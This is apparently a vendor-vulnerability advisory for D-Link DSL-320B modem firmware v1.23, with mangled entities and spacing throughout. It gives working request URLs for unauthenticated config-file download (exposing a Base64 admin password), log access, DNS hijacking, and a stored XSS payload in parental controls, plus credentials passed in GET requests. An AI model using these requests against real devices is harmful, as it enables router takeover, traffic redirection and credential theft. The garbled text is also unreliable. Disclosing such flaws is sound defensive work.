Multiple defects in D-Link DSL-320B

Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010

Developer: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem

Defects Overview

* Access to the Config file without authentication = & gt; full authentication bypass possible! :): (1)

192.168.178.111/config. bin

===& Lt; snip & gt ;==
& Lt; sysUserName value = "admin"/& gt;
& Lt; zipb enable = "1"/& gt;
& Lt; dns dynamic = "disable" primary = "1.1.1.1" secondary = "2.2.2.3" domain = "Home" host = "alpha"/& gt;
& Lt; sysPassword value = "dGVzdA ="/& gt;
===& Lt; snip & gt ;==

= & Gt; sysPassword is Base64 encoded

* Access to the logfile without authentication: (1)
192.168.178.111/status/status_log.sys

* Change the DNS Settings without authentication: (1)

Http: // 192.168.178.111/advanced/adv_dns.xgi? & SET/dns/mode = 0 & SET/dns/mode/server/primarydns = 1.1.1.1 & SET/dns/mode/server/secondarydns = 2.2.2.2

* Stored XSS within parental control (2 ):

= & Gt; Parameter: set/bwlist/entry: 1/hostname

Request:

Http: // 192.168.178.111/home/home_parent.xgi? & Set/bwlist/enable = 1 & set/bwlist/bw_status = 0 & set/bwlist/entry: 1/bw_flag = 0 & set/bwlist/entry: 1/hostname = % 22% 3E % 3 Cimg % 20src = % 220% 22% 20 onerror = alert (1) % 3E & set/bwlist/entry: 1/weekday = 6 & set/bwlist/entry: 1/begintime = 00:00 & set/bwlist/entry: 1/endtime = 23:59 & set/bwlist/entry: 1/store = 1 & set/bwlist/apply = 1

Again you are able to place this XSS without authentication .:)

* Login Credentials in http get are not a good idea = & gt; use HTTP Post! (3)

Http: // 192.168.178.111/login. xgi? User = admin & pass = admin1

* Credentials in http get via password change request are not a good idea = & gt; use HTTP Post! : (3)

Http: // 192.168.178.111/tools/tools_admin.xgi? & Set/sys/account/user/oldpwd = admin & set/sys/account/user/password = test & CMT = 1

Solution

Upgrade to version 1.25

(1)-fixed
(2)-not fixed but authentication needed
(3)-not fixed